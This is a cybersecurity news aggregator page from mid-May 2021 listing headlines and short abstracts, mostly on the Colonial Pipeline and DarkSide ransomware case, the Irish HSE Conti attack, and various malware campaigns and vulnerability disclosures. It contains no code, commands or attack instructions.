Abstract Just as Colonial Pipeline  restored  all of its systems to operational status in the wake of a crippling ransomware incident a week ago, DarkSide, the cybercrime syndicate behind the attack, claimed it lost control of its infrastructure, citing a law enforcement seizure. All the dark web sites operated by the gang, including its DarkSide Leaks blog, ransom collection site, and breach data content delivery network (CDN) servers, have gone dark and remain inaccessible as of writing. In addition, the funds from their cryptocurrency wallets were allegedly exfiltrated to an unknown account, according to a note passed by DarkSide operators to its affiliates. "At the moment, these servers cannot be accessed via SSH, and the hosting panels have been blocked," the  announcement  obtained by Intel 471 read. The development comes as DarkSide closed its Ransomware-as-a-Service (RaaS) affiliate program for good "due to the pressure from the U.S.", with the group stating th

The Hacker News

May 17, 2021 – Ransomware

Toshiba Business Reportedly Hit by DarkSide Ransomware Full Text

Abstract Ransomware group said to have stolen over 700GB of data

Infosecurity Magazine

May 17, 2021 – Ransomware

Conti ransomware demanded $20M ransom to Ireland Health Service Executive Full Text

Abstract Ireland Health Service Executive (HSE) refuses to pay a $20 million ransom demand after its systems were hit by the Conti ransomware gang. Ireland’s Health Service Executive that was forced to shut down its IT systems on Friday after being...

Security Affairs

May 17, 2021 – Ransomware

The bizarre story of the inventor of ransomware Full Text

Abstract Although it was a pretty basic malware, it was the first time many people had ever heard of the concept — or of digital extortion. It's unclear if any people or organizations paid the ransom.

CNN Money

May 17, 2021 – Vulnerabilities

AMD Warns of Two Attacks That Could Allow Bypassing of SEV Protection System Full Text

Abstract AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing the SEV technology implemented to prevent rogue operating systems on virtual machines.

Security Affairs

May 17, 2021 – Malware

Clark County confirms malware shut down computer servers Full Text

Abstract The county’s 911 system remained working amid the incident. Elements of the county’s server are gradually coming back online. However, county officials say the process is still ongoing.

Springfield News-Sun

May 17, 2021 – Ransomware

Avaddon Ransomware gang hacked France-based Acer Finance Full Text

Abstract Avaddon ransomware gang made the headlines again, the cybercrime gang has breached the France-based financial consultancy firm Acer Finance and gave the firm 240 hours to cooperate with their demands.

Security Affairs

May 17, 2021 – General

Social Engineering: How to Keep Security Researchers Safe Full Text

Abstract Attacking the very people who work on stopping threat actors may seem like a bad idea. But some threat groups do go after people who’ve made a career doing vulnerability research.

Security Intelligence

May 16, 2021 – Ransomware

Insurer AXA hit by ransomware after dropping support for ransom payments Full Text

Abstract Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong, and the Philippines have been struck by a ransomware cyber attack. As seen by BleepingComputer yesterday, the Avaddon ransomware group claimed on their leak site that they had stolen over 3 TB of sensitive data from AXA's Asian operations.

BleepingComputer

May 16, 2021 – Ransomware

Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia Full Text

Abstract Avaddon ransomware gang has breached the France-based financial consultancy firm Acer Finance. Avaddon ransomware gang made the headlines again, the cybercrime gang has breached the France-based financial consultancy firm Acer Finance. Acer Finance...

Security Affairs

May 16, 2021 – Vulnerabilities

Two flaws could allow bypassing AMD SEV protection system Full Text

Abstract The chipmaker AMD published guidance for two new attacks against its SEV (Secure Encrypted Virtualization) protection technology. Chipmaker AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing the SEV (Secure...

Security Affairs

May 16, 2021 – Breach

Herff Jones credit card breach impacts college students across the US Full Text

Abstract Graduating students from several universities in the U.S. have been reporting fraudulent transactions after using payment cards at popular cap and gown maker Herff Jones.

BleepingComputer

May 16, 2021 – Breach

Colonial breach underscores concerns over paying hackers Full Text

Abstract Colonial Pipeline's decision to pay the cyber criminals behind a ransomware attack that forced the company to temporarily shut down operations has reignited the debate around whether victims of such attacks should pay to regain access to their networks.

The Hill

May 16, 2021 – Malware

MSBuild tool used to deliver RATs filelessly Full Text

Abstract Hackers abuses Microsoft Build Engine (MSBuild) to filelessly deliver malware on targeted Windows systems, including RAT and password-stealer. Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver...

Security Affairs

May 16, 2021 – General

Security Affairs newsletter Round 314 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. CISA MAR report provides technical details of FiveHands RansomwareSQL injection issue in Anti-Spam...

Security Affairs

May 16, 2021 – APT

Pakistan-linked Transparent Tribe APT expands its arsenal Full Text

Abstract Alleged Pakistan-Linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware. Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal....

Security Affairs

May 15, 2021 – Ransomware

Ireland’s Health Services hit with $20 million ransomware demand Full Text

Abstract Ireland's health service, the HSE, says they are refusing to pay a $20 million ransom demand to the Conti ransomware gang after the hackers encrypted computers and disrupted health care in the country.

BleepingComputer

May 15, 2021 – Phishing

Fake Chrome App Goes Viral with Smishing Full Text

Abstract A new Android malware has surfaced that fakes the Google Chrome app. Attackers used it as part of a sophisticated hybrid cyberattack campaign that also uses mobile phishing to steal credentials.

Cyware Alerts - Hacker News

May 15, 2021 – Policy and Law

European police dismantle major online investment fraud ring that causes €30 Million in losses Full Text

Abstract A joint operation of European law enforcement agencies and coordinated by Europol dismantled a criminal ring involved in investment fraud. A joint investigation of European law enforcement agencies supported by Europol and Eurojust dismantled...

Security Affairs

May 15, 2021 – Privacy

Tor users, beware: ‘Scheme flooding’ technique may be used to deanonymize you Full Text

Abstract FingerprintJS said it has identified a more dubious fingerprinting technique capable of generating a consistent identifier across different desktop browsers, including the Tor Browser.

The Register

May 15, 2021 – Hacker

Group behind Colonial Pipeline hack to shut down operations: report Full Text

Abstract The group behind the ransomware attack on Colonial Pipeline is reportedly shutting down its operations.

The Hill

May 15, 2021 – Ransomware

Major hacking forums XSS and Exploit ban ads from ransomware gangs Full Text

Abstract XSS forum (previously known as DaMaGeLab) one of the most popular hacking forums, announced that it would ban the ads published by ransomware gangs. The popular hacking forum XSS forum, previously known as DaMaGeLab, announced that that it would ban the ads published...

Security Affairs

May 15, 2021 – Ransomware

Toshiba subsidiary confirms ransomware attack, as reports suggest possible DarkSide involvement Full Text

Abstract European units of Japanese tech giant Toshiba are investigating a security incident in which scammers may have used a similar hacking tool to the malware used against IT systems at Colonial Pipeline.

Cyberscoop

May 15, 2021 – Ransomware

QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks Full Text

Abstract QNAP warns of an actively exploited Roon Server zero-day flaw and eCh0raix ransomware attacks on its NAS devices. QNAP warns customers of threat actors that are targeting its Network Attached Storage (NAS) devices with eCh0raix ransomware attacks...

Security Affairs

May 15, 2021 – Ransomware

Lorenz Ransomware Uses Customized Malware to Target Organizations Full Text

Abstract Dubbed Lorenz, the ransomware gang began operating a month ago and has since compiled a growing list of victims whose stolen data has been published on a data leak site, as reported by BleepingComputer.

Heimdal Security

May 14, 2021 – Ransomware

Ransomware ads now also banned on Exploit cybercrime forum Full Text

Abstract The team behind Exploit, a major cybercrime forum used by ransomware gangs to hire affiliates and advertise their Ransomware-as-a-Service (RaaS) services, has announced that ransomware ads are now banned and will be removed.

BleepingComputer

May 14, 2021 – Attack

Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review Full Text

Abstract Toshiba Tec Corp, which makes products such as bar code printers and is valued at $2.3 billion, was hacked by DarkSide - the group behind the Colonial Pipeline attack, its French subsidiary said.

Reuters

May 14, 2021 – General

Hillicon Valley: Amazon worker alleges security had keys to mailbox used in union vote | Facebook loses bid to block Irish watchdog’s data flow decision | Lawmakers move to defend pipelines against cyber threats Full Text

Abstract A worker at Amazon’s Bessemer, Ala. facility dropped a big allegation about security guards having access to a mailbox during the unionization election at a National Labor Relations Board hearing Friday. Meanwhile, Facebook lost a bid to block an Irish watchdog's draft decision that could suspend the tech giant’s ability to transfer data from the U.S. to the EU, and bipartisan groups of House lawmakers rolled out two pieces of legislation to protect critical infrastructure against cyberattacks following the ransomware attack on Colonial Pipeline. 

The Hill

May 14, 2021 – Malware

Hackers Using Microsoft Build Engine to Deliver Malware Filelessly Full Text

Abstract Threat actors are abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems. The actively ongoing campaign is said to have emerged last month, researchers from cybersecurity firm Anomali  said  on Thursday, adding the malicious build files came embedded with encoded executables and shellcode that deploy  backdoors , allowing the adversaries to take control of the victims' machines and steal sensitive information. MSBuild is an open-source build tool for .NET and Visual Studio developed by Microsoft that allows for compiling source code, packaging, testing, deploying applications. In using MSBuild to filelessly compromise a machine, the idea is to stay under the radar and thwart detection, as such malware makes use of a legitimate application to load the attack code into memory, thereby leaving no traces of infection on the system and giving attackers a high level of stealth. As of writing, o

The Hacker News

May 14, 2021 – Business

Lemonade Denies “Unforgivably Negligent” Security Gaffe Full Text

Abstract Insurtech company says alleged lapse was merely customers sharing their quotes online

Infosecurity Magazine

May 14, 2021 – General

If We Don’t Secure People, Information Security Will Remain a Pipe Dream Full Text

Abstract Until employees are appropriately safeguarded, true information security is likely to remain just beyond reach.

Lawfare

May 14, 2021 – Privacy

Scheme flooding fingerprint technique may deanonymize Tor users Full Text

Abstract FingerprintJS experts devised a fingerprinting technique, named scheme flooding, that could allow identifying users across different desktop browsers, including the Tor Browser. FingerprintJS experts devised a new fingerprinting technique, named scheme...

Security Affairs

May 14, 2021 – Malware

RevengeRAT and AysncRAT target aerospace and travel sectors Full Text

Abstract a campaign of remote access trojans is targeting the aerospace and travel industries with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AysncRAT.

SCMagazine

May 14, 2021 – Malware

FIN7 Backdoor Masquerades as Ethical Hacking Tool Full Text

Abstract The financially motivated cybercrime gang behind the Carbanak RAT is back with the Lizar malware, which can harvest all kinds of info from Windows machines.

Threatpost

May 14, 2021 – Ransomware

The Week in Ransomware - May 14th 2021 - One down, many more to go Full Text

Abstract Ransomware took the media spotlight this week after a ransomware gang known as DarkSide targeted critical infrastructure in the USA.

BleepingComputer

May 14, 2021 – Ransomware

Ransomware Gangs Are Now Leaking Stolen Data More Often Full Text

Abstract Researchers say more than 2,100 companies had their data leaked over data leak sites hosted by ransomware groups since 2019, suggesting cybercriminals are doing it more frequently to extort from their victims. Other cybercriminals are expected to follow the suit in the future.

Cyware Alerts - Hacker News

May 14, 2021 – Policy and Law

Lawmakers roll out legislation to defend pipelines against cyber threats Full Text

Abstract A bipartisan group of more than a dozen House lawmakers have reintroduced legislation to defend pipelines against cyberattacks, with the bill coming on the heels of the devastating ransomware attack that forced the shutdown of Colonial Pipeline.

The Hill

May 14, 2021 – General

Report to Your Management with the Definitive ‘Incident Response for Management’ Presentation Template Full Text

Abstract Security incidents occur. It's not a matter of 'if' but of 'when.' There are security products and procedures that were implemented to optimize the IR process, so from the 'security-professional' angle, things are taken care of. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more challenging task. It's a little surprise — managements are typically not security savvy and don't really care about the bits and bytes in which the security pro masters. Cynet addresses this gap with the IR Reporting for Management PPT template , providing CISOs and CIOs with a clear and intuitive tool to report both the ongoing IR process and its conclusion. The IR for Management template enables CISOs and CIOs to communicate with the two key points that management cares about—assurance that the incident is under control and a clear understanding of imp

The Hacker News

May 14, 2021 – Policy and Law

US Sentences Cyber-Stalker Who Sent Sex Workers to Family’s Home Full Text

Abstract Hawaiian widower placed under 3-year supervision for cyber-stalking a Utah family

Infosecurity Magazine

May 14, 2021 – Criminals

Darkside gang lost control of their servers and funds Full Text

Abstract The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from the victims. Darkside ransomware operators say they have lost control of their servers and funds resulting...

Security Affairs

May 14, 2021 – Government

In executive order, federal security provides impetus for far reaching cyber implications Full Text

Abstract At the core, Biden’s executive order looks to improve federal cybersecurity. But the tactics could have a trickle down impact that drive greater collaboration and improves security standards throughout industry.

SCMagazine

May 14, 2021 – Covid-19

Verizon: Pandemic Ushers in ⅓ More Cyber-Misery Full Text

Abstract The DBIR – Verizon’s 2021 data breach report – shows spikes in sophisticated phishing, financially motivated cyberattacks and a criminal focus on web-application servers.

Threatpost

May 14, 2021 – Ransomware

DarkSide ransomware servers reportedly seized, operation shuts down Full Text

Abstract The DarkSide ransomware operation has allegedly shut down after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

BleepingComputer

May 14, 2021 – Vulnerabilities

Citrix Patches Vulnerability in Workspace App for Windows Full Text

Abstract Tracked as CVE-2021-22907, the flaw could be exploited by local attackers to escalate their privileges to SYSTEM level. All supported versions of Citrix Workspace app for Windows are affected by it.

Security Week

May 14, 2021 – Policy and Law

Lawmakers introduce bill to protect critical infrastructure against cyberattacks Full Text

Abstract Rep. Elissa Slotkin (D-Mich.) and other bipartisan House lawmakers on Friday introduced legislation designed to protect critical systems against cyberattacks, a week after a ransomware attack on the Colonial Pipeline significantly disrupted the fuel supply for portions of the country.

The Hill

May 14, 2021 – Hacker

Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal Full Text

Abstract Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of its operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called  Transparent Tribe , also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking legitimate Indian military and defense organizations, and other malicious domains posing as file-sharing sites to host malicious artifacts. "While military and defense personnel continue to be the group's primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting," researchers from Cisco Talos  said  on Thursday. These domains are used to deliver maldocs distributing  CrimsonRAT , and ObliqueRAT, with the group incorporating new phishin

The Hacker News

May 14, 2021 – Breach

Rapid7 Source Code Accessed in Cyber-attack Full Text

Abstract Cybersecurity company’s source code compromised during supply-chain attack on Codecov

Infosecurity Magazine

May 14, 2021 – Hacker

Magecart gang hides PHP-based web shells in favicons Full Text

Abstract Magecart cybercrime gang is using favicon to hide malicious PHP web shells used to maintain remote access to inject JavaScript skimmers into online stores. Magecart hackers are distributing malicious PHP web shells hidden in website favicon to inject...

Security Affairs

May 14, 2021 – Government

Biden’s executive order aims to improve threat sharing by revising language in federal contracts Full Text

Abstract If successful, the goal could mean greater partnership between government and industry, addressing decades of contracting morass that stilted sharing of information about vulnerabilities.

SCMagazine

May 14, 2021 – Ransomware

QNAP warns of eCh0raix ransomware attacks, Roon Server zero-day Full Text

Abstract QNAP warns customers of an actively exploited Roon Server zero-day bug and eCh0raix ransomware attacks targeting their Network Attached Storage (NAS) devices, just two weeks after alerting them of an ongoing AgeLocker ransomware outbreak.

BleepingComputer

May 14, 2021 – Botnet

TeaBot Trojan: Active and Performing Fraudulent Activities Full Text

Abstract Cybersecurity researchers reported a new Android banking trojan that hijacks user credentials and text messages to distribute fraudulent activities targeting banks in Spain, Germany, the Netherlands, Belgium, and Italy.

Cyware Alerts - Hacker News

May 14, 2021 – Ransomware

Irish health service forced to shut down IT systems after ransomware attack Full Text

Abstract Ireland’s health care system was forced to shut down its IT systems Friday following what it described as a "significant" ransomware attack that disrupted operations.

The Hill

May 14, 2021 – Hacker

Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons Full Text

Abstract Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores," Malwarebytes Jérôme Segura  said  in a Thursday write-up. "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer." Injecting web skimmers on e-commerce websites to steal credit card details is a tried-and-tested modus operandi of Magecart, a consortium of different hacker groups who target online shopping cart systems. Also known as formjacking attacks, the skimmers take the form of JavaScript code that the operators stealthily insert into an e-commerce website, often on payment pages, with an intent to c

The Hacker News

May 14, 2021 – Ransomware

Ireland’s Healthcare System’s IT Offline Following Ransomware Attack Full Text

Abstract HSE Ireland reveals it has taken its IT systems offline due to a "significant ransomware attack"

Infosecurity Magazine

May 14, 2021 – Ransomware

Ireland’s Health Service Executive hit by ransomware attack Full Text

Abstract Ireland’s Health Service Executive service shut down its IT systems after they were hit with a “significant ransomware attack.” Another major ransomware attack made the headlines, this time the victim is Ireland’s Health Service Executive...

Security Affairs

May 14, 2021 – Criminals

Arkose Labs looks to hit cybercriminals where it hurts with $70 million cash infusion Full Text

Abstract Funds will filter in part to research and development, building upon the Arkose model of undermining economic drivers behind fraud until attackers opt out.

SCMagazine

May 14, 2021 – Ransomware

Irish healthcare shuts down IT systems after Conti ransomware attack Full Text

Abstract Ireland's Health Service Executive(HSE), the country's publicly funded healthcare system, has shut down all IT systems after its network was breached in a ransomware attack.

BleepingComputer

May 14, 2021 – Hacker

Darkside Hacking Group Linked to Colonial Pipeline Attack Says it is Closing Down Full Text

Abstract DarkSide has told associates it has lost access to the infrastructure it uses to run its operation and would be shutting down, citing pressure from law enforcement and from the U.S., FireEye said.

The Wall Street Journal

May 14, 2021 – Malware

Microsoft Alerts Aviation and Travel Firms to RAT Campaign Full Text

Abstract Sophisticated crypter-as-a-service ultimately leads to data theft

Infosecurity Magazine

May 14, 2021 – Ransomware

Colonial Pipeline likely paid a $5M ransom to DarkSide Full Text

Abstract DarkSide demanded a $5 million ransom to Colonial Pipeline, which has quickly recovered operations, did it pay? The Colonial Pipeline facility in Pelham, Alabama, was hit by a cybersecurity attack on Friday and its operators were forced to shut down...

Security Affairs

May 14, 2021 – Business

BluBracket raises $12 million to expand operations and support a shift left in code testing Full Text

Abstract Code automation company BluBracket on Thursday said it raised $12 million in Series A funding so it can continue to work with DevSecOps teams to build security into products from the start and shift code development left.

SCMagazine

May 14, 2021 – Malware

Snip3 Crypter Service Delivers Multiple RAT Families Full Text

Abstract Researchers have recently monitored a highly sophisticated Crypter-as-a-Service that delivers multiple RAT families onto target machines through phishing emails. Besides, it has the ability to distinguish sandboxing and virtual environments and deliver malware accordingly.

Cyware Alerts - Hacker News

May 14, 2021 – General

Quarter of CISOs Self-Medicate as Pandemic Stress Spikes Full Text

Abstract OneLogin claims only half have access to mental health services

Infosecurity Magazine

May 14, 2021 – Ransomware

Attacks by Avaddon Ransomware are Escalating Full Text

Abstract Ransomware attacks by the Avaddon group are targeting organizations from several sectors based in the U.S. and worldwide. According to the FBI, the ransomware associates are breaching the networks of healthcare, manufacturing, and other private sector organizations worldwide.

Cyware Alerts - Hacker News

May 14, 2021 – Ransomware

US pipeline ransomware attack serves as fair warning to persistent corporate inertia over security Full Text

Abstract That companies continue to disregard the need for basic cybersecurity hygiene signals the need for firmer action, especially as cybercriminals turn their focus to operational technology sectors.

ZDNet

May 14, 2021 – Outage

Colonial Reportedly Paid $5 Million Ransom Full Text

Abstract Pipeline still suffered several-day outage

Infosecurity Magazine

May 14, 2021 – General

Big Cybersecurity Tips For Remote Workers Who Use Their Own Tech Full Text

Abstract As the total number of people working from home has grown dramatically in the last year or two, so has the number of individuals who use all of their own technology for their jobs. If you're a remote worker who relies on your own PC to get your work done, then you may be at a heightened risk for some of the major threats that are impacting the computer industry as a whole. Relatively few people take all of the recommended precautions when using their own technology. While it's unlikely that people are engaged in any riskier behaviors than they were before, the fact that few people have the time to follow all the relevant pieces of cybersecurity news means some people might be unaware of certain active threats. That may explain how a password manager was  used to install malicious code  on a large number of client machines. Though you might not want to follow all of the news that comes out about security issues on a daily basis, you might find it helpful to pay close attentio

The Hacker News

May 14, 2021 – Vulnerabilities

FortiGuard Labs Discovers Multiple Critical Zero Day Vulnerabilities in Adobe Illustrator Full Text

Abstract They are identified as CVE-2021-21103, CVE-2021-21104, and CVE-2021-21105. All these vulnerabilities have different root causes related to a variety of Illustrator Plugins.

Fortinet

May 14, 2021 – Business

Fidelis Buys CloudPassage To Better Monitor Cloud Assets Full Text

Abstract Fidelis was impressed by CloudPassage’s ability to collect telemetry from the enterprise and deliver cloud security posture management and cloud workload protection from a single platform.

CRN

May 14, 2021 – Ransomware

Colonial Pipeline Paid Nearly $5 Million in Ransom to Cybercriminals Full Text

Abstract Colonial Pipeline on Thursday restored operations to its entire pipeline system nearly a week following a ransomware infection targeting its IT systems, forcing it to reportedly shell out nearly $5 million to restore control of its computer networks. "Following this restart, it will take several days for the product delivery supply chain to return to normal," the company said in a statement on Thursday evening. "Some markets served by Colonial Pipeline may experience, or continue to experience, intermittent service interruptions during this start-up period. Colonial will move as much gasoline, diesel, and jet fuel as is safely possible and will continue to do so until markets return to normal." The company's official website , however, has been taken offline as of writing with an access denied message "This request was blocked by the security rules." Bloomberg, citing "two people familiar with the transaction," said the company made t

The Hacker News

May 14, 2021 – Vulnerabilities

Cross-browser tracking vulnerability tracks you via installed apps Full Text

Abstract Researchers have developed a way to track a user across different browsers on the same machine by querying the installed applications on the device.

BleepingComputer

May 14, 2021 – Breach

Rapid7 Source Code Breached in Codecov Supply-Chain Attack Full Text

Abstract Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositories for internal tooling for our [Managed Detection and Response] service was accessed by an unauthorized party outside of Rapid7," the Boston-based firm  said  in a disclosure. "These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers." On April 15, software auditing startup Codecov alerted customers that its Bash Uploader utility had been infected with a backdoor as early as January 31 by unknown parties to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1. "The actor gained access bec

The Hacker News

May 14, 2021 – Attack

Rapid7 says source code, credentials accessed as a Rresult of Codecov supply-chain attack Full Text

Abstract Rapid7 disclosed that unauthorized third-party had access to source code and customer data as result of Codecov supply chain attack. Cyber security vendor Rapid7 reveals it was impacted by the Codecov software supply chain attack, attackers had access...

Security Affairs

May 13, 2021 – Ransomware

Popular Russian hacking forum XSS bans all ransomware topics Full Text

Abstract One of the most popular Russian-speaking hacker forums, XSS, has banned all topics promoting ransomware to prevent unwanted attention.

BleepingComputer

May 13, 2021 – Ransomware

Chemical distributor pays $4.4 million to DarkSide ransomware Full Text

Abstract Chemical distribution company Brenntag paid a $4.4 million ransom in Bitcoin to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

BleepingComputer

May 13, 2021 – Privacy

Apple’s Find My network can be abused to leak secrets to the outside world via passing devices Full Text

Abstract Passing Apple devices can be used to sneak out portions of information from one place to another, such as a computer on the other side of the world, over the air without any network connectivity.

The Register

May 13, 2021 – General

Hillicon Valley: Colonial pipeline is back online, but concerns remain | Uber, Lyft struggle with driver supply | Apple cuts controversial hire Full Text

Abstract President BidenJoe BidenBiden says Beau's assessment of first 100 days would be 'Be who you are' Biden: McCarthy's support of Cheney ouster is 'above my pay grade' Conservative group sues over prioritization of women, minorities for restaurant aid MORE on Thursday said that while the Russian government was not behind the recent ransomware attack on the Colonial Pipeline, the cyber criminals involved were based in Russia, and his administration would take steps to disrupt the group. Colonial Pipeline, which restarted operations Wednesday, reportedly chose to pay the ransom to gain access to its networks. In non-pipeline news, Amazon said it will soon hire 75,000 additional employees in the U.S. and Canada. 

The Hill

May 13, 2021 – General

Cyber-bullying Spawns Artistic Protest Full Text

Abstract Artists turn 700 misogynistic comments made online into 3,000m-long artwork

Infosecurity Magazine

May 13, 2021 – Government

Everything You Need to Know about the New Executive Order on Cybersecurity Full Text

Abstract The Biden Administration has released its much-anticipated Executive Order aiming to improve federal cybersecurity standards and other aspects of cybersecurity.  Here’s what you need to know.

Lawfare

May 13, 2021 – General

Security at Bay: Critical Infrastructure Under Attack Full Text

Abstract The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide. The attack perpetrated by hackers on oil company Colonial Pipeline highlights the dangers that are facing Industrial Control Systems (ICS)...

Security Affairs

May 13, 2021 – Vulnerabilities

Developers knowingly push flawed code, doubt build environments are secure Full Text

Abstract A recent survey found that most development teams, 81%, knowingly pushed flawed code live, and 20% senior of managers even admitted to committing this practice often.

SCMagazine

May 13, 2021 – Malware

Fresh Loader Targets Aviation Victims with Spy RATs Full Text

Abstract The campaign is harvesting screenshots, keystrokes, credentials, webcam feeds, browser and clipboard data and more, with RevengeRAT or AsyncRAT payloads.

Threatpost

May 13, 2021 – Breach

Rapid7 source code, credentials accessed in Codecov supply-chain attack Full Text

Abstract US cybersecurity firm Rapid7 has disclosed that some source code repositories were accessed in a security incident linked to the supply-chain attack that recently impacted customers of the popular Codecov code coverage tool.

BleepingComputer

May 13, 2021 – Ransomware

Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom Full Text

Abstract Colonial Pipeline Co. paid nearly $5 million to Eastern European hackers on Friday, contradicting reports earlier this week that the company had no intention of paying an extortion fee.

Bloomberg

May 13, 2021 – Government

Biden says Colonial Pipeline hackers based in Russia, but not government-backed Full Text

Abstract President Biden on Thursday confirmed that the cyber criminals involved in launching a ransomware attack that disrupted operations at Colonial Pipeline last week are likely based in Russia, though he said officials do not believe that the Russian government was involved. 

The Hill

May 13, 2021 – General

Cyber-attacks Cost Small US Businesses $25k Annually Full Text

Abstract New research reveals cyber-attacks leave small businesses with big bills

Infosecurity Magazine

May 13, 2021 – General

Please vote Security Affairs – 1 day left Full Text

Abstract Hi GuysI need your support. I became aware only not that we can nominate SecurityAffairs as Best Personal Blog. I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform The...

Security Affairs

May 13, 2021 – Breach

Rapid7: Attackers got ‘limited access’ to source code, customer data after Codecov breach Full Text

Abstract The company claims no other systems or parts of its corporate network were compromised after using Codecov’s corrupted Bash Uploader script.

SCMagazine

May 13, 2021 – General

Pipeline Update: Biden Executive Order, DarkSide Detailed and Gas Bags Full Text

Abstract FBI/CISA warn about the RaaS network behind the Colonial hack, Colonial restarts operations, and researchers detail groups that rent the ransomware.

Threatpost

May 13, 2021 – Ransomware

Colonial Pipeline restores operations, $5 million ransom demanded Full Text

Abstract Colonial Pipeline Company has recovered quickly from the ransomware attack suffered less than a week ago and expects all its infrastructure to be fully operational today.

BleepingComputer

May 13, 2021 – APT

Transparent Tribe APT Expands its Windows Malware Arsenal with ObliqueRAT Full Text

Abstract Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations.

Cisco Talos

May 13, 2021 – Government

Pelosi says firms should not pay ransoms to hackers Full Text

Abstract Speaker Nancy Pelosi (D-Calif.) warned Thursday that private firms should reject hackers' demands for ransoms, just hours after reports emerged that a major energy company had paid almost $5 million to help restore service following a crippling ransomware attack.

The Hill

May 13, 2021 – General

Consumers Unforgiving of Merchants’ Data Failings Full Text

Abstract Data-conscious online shoppers in the US will ditch a merchant over a single lapse in data security

Infosecurity Magazine

May 13, 2021 – Attack

Organizations in aerospace and travel sectors under attack, Microsoft warns Full Text

Abstract Microsoft warns of a malware-based campaign that targeted organizations in the aerospace and travel sectors in the past months. Microsoft researchers revealed that organizations in the aerospace and travel sectors have been targeted in the past months...

Security Affairs

May 13, 2021 – Malware

Microsoft build tool abused to deliver password-stealing malware Full Text

Abstract Threat actors are abusing the Microsoft Build Engine (MSBuild) to deploy remote access tools and information-stealing malware filelessly as part of an ongoing campaign.

BleepingComputer

May 13, 2021 – Business

AI-powered identity access management platform Authomize raises $16M Full Text

Abstract Cloud-based authorization startup Authomize today announced that it raised $16 million in series A funding led by Innovation Endeavors, bringing the startup’s total raised to $22 million to date.

Venture Beat

May 13, 2021 – Ransomware

Colonial paid hackers almost $5M in ransom: report Full Text

Abstract Colonial Pipeline paid almost $5 million in ransom to hackers last Friday despite reports that said the company had no intention of paying, Bloomberg news reported.

The Hill

May 13, 2021 – Covid-19

Record Number of Breaches Detected Amid #COVID19 Full Text

Abstract 85% of breaches analyzed in the report involved a human element

Infosecurity Magazine

May 13, 2021 – Vulnerabilities

Cisco fixes AnyConnect Client VPN zero-day disclosed in November Full Text

Abstract Cisco has addressed a zero-day in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code. Cisco has addressed a zero-day vulnerability in Cisco AnyConnect Secure Mobility Client, tracked as CVE-2020-3556, that...

Security Affairs

May 13, 2021 – Ransomware

Meet Lorenz — A new ransomware gang targeting the enterprise Full Text

Abstract A new ransomware operation known as Lorenz targets organizations worldwide with customized attacks demanding hundreds of thousands of dollars in ransoms.

BleepingComputer

May 13, 2021 – Ransomware

Norwegian Green Energy Company Volue Hit by Ransomware Attack Full Text

Abstract Norway-based green energy solutions provider Volue has been working on restoring systems after being targeted in a ransomware attack by the Ryuk operators which was detected on May 5.

Security Week

May 13, 2021 – Ransomware

Insurance giant CNA fully restores systems after ransomware attack Full Text

Abstract Leading US-based insurance company CNA Financial has fully restored systems following a Phoenix CryptoLocker ransomware attack that disrupted its online services and business operations during late March.

BleepingComputer

May 13, 2021 – Vulnerabilities

Cisco fixes 6-month-old AnyConnect VPN zero-day with exploit code Full Text

Abstract Cisco has fixed a six-month-old zero-day vulnerability found in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code.

BleepingComputer

May 13, 2021 – Business

Code-scanning platform BluBracket nabs $12M for enterprise security Full Text

Abstract Code security startup BluBracket today announced it has raised $12 million in a Series A round led by Evolution Equity Partners to further develop BluBracket’s products and grow its sales team.

Venture Beat

May 13, 2021 – Accident

Crypto exchange glitch causes duplicate purchases, delayed credits Full Text

Abstract This week, recurring glitches on the popular cryptocurrency exchange Crypto.com caused multi-day delays for users in receiving their purchased assets. Moreover, those reattempting "declined" or "expired" transactions were charged multiple times for duplicate purchases.

BleepingComputer

May 13, 2021 – Government

CISA and FBI Provide Technical Details and Mitigations for DarkSide Ransomware-as-a-Service Full Text

